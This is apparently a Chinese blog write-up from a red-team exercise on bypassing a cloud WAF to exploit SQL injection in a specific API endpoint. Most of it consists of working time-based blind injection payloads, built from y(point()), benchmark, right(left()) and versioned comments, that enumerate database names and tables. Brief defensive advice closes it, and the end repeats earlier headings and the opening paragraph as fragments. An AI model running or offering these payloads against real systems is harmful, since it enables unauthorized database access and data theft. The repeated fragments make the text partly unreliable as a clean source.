MySQL WAF绕过技巧详解：基于Y函数与函数组合的绕过方法<\/h1>

一、案例背景<\/h2>
在一次HW（网络安全攻防演练）中，发现某云WAF对SQL注入的防护存在可绕过漏洞。通过使用`y(point(1,1))<\/code>函数结合特定语法构造，成功绕过了WAF的检测机制。<\/p>`

二、注入点识别<\/h2>
初始注入点URL结构：<\/p>
\/api\/customerPolicy\/selectPolicy?tag=&input=&policyCategory=&voidDate=&certificateUnit=&status=&nature1=&nature2=&areas=1&city=&title=&publishType=&belongAreas=&orderType=1&page=1&pageSize=10&ts=175082141514&orderBy=1
<\/code><\/pre>
三、WAF拦截规则分析<\/h2>
1. 基本拦截行为测试<\/h3>

1 or (select)<\/code> → 不拦截<\/li>
1 or (select*)<\/code> → 拦截<\/li>
1 or (select 0)<\/code> → 拦截<\/li>
1 or (select())<\/code> → 拦截<\/li>
<\/ul>
结论<\/strong>：WAF拦截select+xx<\/code>的组合，但不拦截单独的select<\/code>关键字。<\/p>
2. 函数拦截测试<\/h3>

sleep(3)<\/code> → 拦截<\/li>
benchmark(51111111,1)<\/code> → 不拦截<\/li>
substr()<\/code> → 拦截<\/li>
user()<\/code>\/database()<\/code>\/version()<\/code> → 拦截<\/li>
user<\/code>\/database<\/code>\/version<\/code>（无括号） → 不拦截<\/li>
<\/ul>
结论<\/strong>：WAF拦截的是关键字+括号的组合，而非关键字本身。<\/p>
四、关键绕过技术<\/h2>
1. Y函数绕过法<\/h3>
使用y(point(1,1))<\/code>函数可以绕过WAF检测：<\/p>
1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/benchmark(51111111,1))x)
<\/code><\/pre>
2. 时间延迟替代方案<\/h3>
当sleep()<\/code>被拦截时，使用benchmark()<\/code>替代：<\/p>
benchmark(51111111,1)
<\/code><\/pre>
3. 条件判断构造<\/h3>
加入if<\/code>判断构造盲注：<\/p>
if(1=1,benchmark(51111111,1),1)
<\/code><\/pre>
4. 字符串函数绕过<\/h3>
当substr()<\/code>被拦截时，使用right(left())<\/code>组合：<\/p>
right(left(1,1),1)
<\/code><\/pre>
5. 函数括号绕过技术<\/h3>
方法一：使用反引号<\/h4>
`version`()
<\/code><\/pre>
方法二：使用数字注释<\/h4>
\/*!12345database*\/()
<\/code><\/pre>
方法三：空格分割<\/h4>
version ()
<\/code><\/pre>
注意<\/strong>：user ()<\/code>和database ()<\/code>可能无法正常执行，但version ()<\/code>可以。<\/p>
6. 信息模式表绕过<\/h3>
当information_schema.tables<\/code>被拦截时：<\/p>

information_schema<\/code> → 不拦截<\/li>
information_schema.x<\/code> → 拦截<\/li>
<\/ul>
替代方案<\/strong>：使用sys.schema_auto_increment_columns<\/code><\/p>
select group_concat(table_name) from sys.schema_auto_increment_columns
<\/code><\/pre>
五、完整注入流程<\/h2>
1. 确认注入点<\/h3>
\/api\/customerPolicy\/selectPolicy?...&orderType=1+or+y(point(1,1))...
<\/code><\/pre>
2. 时间盲注验证<\/h3>
...orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/benchmark(51111111,1))x)...
<\/code><\/pre>
3. 条件盲注构造<\/h3>
...orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left(1,1),1))=1,benchmark(51111111,1),1))x)...
<\/code><\/pre>
4. 数据库信息获取<\/h3>
...orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left(\/*!12345database*\/(),1),1))!=1,benchmark(51111111,1),1))x)...
<\/code><\/pre>
5. 表名枚举<\/h3>
...orderType=1+or+y(point(1,1))+or+(select\/**\/0\/**\/from(select\/**\/if(ascii(right(left((select\/*!5555555*\/group_concat(table_name)\/*!12345*\/from\/*!12345*\/(sys.schema_auto_increment_columns\/*!12345*\/)),1),1))!=1,benchmark(51111111,1),1))x)...
<\/code><\/pre>
六、技术总结<\/h2>

Y函数妙用<\/strong>：y(point(1,1))<\/code>是不常见但有效的绕过函数<\/li>
函数组合<\/strong>：通过函数组合替代被拦截的单个函数<\/li>
注释技巧<\/strong>：\/*!12345*\/<\/code>数字注释可有效分割关键字<\/li>
系统表替代<\/strong>：当information_schema<\/code>被拦截时，使用sys<\/code>库中的表<\/li>
空格分割<\/strong>：在函数名和括号间插入空格可绕过部分检测<\/li>
<\/ol>
七、防御建议<\/h2>

更新WAF规则，加入对y(point())<\/code>等非常用函数的检测<\/li>
加强对函数名与括号间空格的检测<\/li>
限制对sys<\/code>库的访问权限<\/li>
对所有用户输入进行严格的参数化查询处理<\/li>
定期测试WAF规则的有效性，特别是针对新型绕过技术<\/li>
<\/ol>
此案例展示了即使面对商业WAF，通过深入分析其检测规则并巧妙组合SQL语法，仍可能实现绕过。这强调了多层防御和安全编码实践的重要性。<\/p>

MySQL WAF绕过技巧详解：基于Y函数与函数组合的绕过方法<\/h1>

一、案例背景<\/h2> 在一次HW（网络安全攻防演练）中，发现某云WAF对SQL注入的防护存在可绕过漏洞。通过使用y(point(1,1))<\/code>函数结合特定语法构造，成功绕过了WAF的检测机制。<\/p>

三、WAF拦截规则分析<\/h2>

5. 函数括号绕过技术<\/h3>

五、完整注入流程<\/h2>

一、案例背景<\/h2>
在一次HW（网络安全攻防演练）中，发现某云WAF对SQL注入的防护存在可绕过漏洞。通过使用`y(point(1,1))<\/code>函数结合特定语法构造，成功绕过了WAF的检测机制。<\/p>`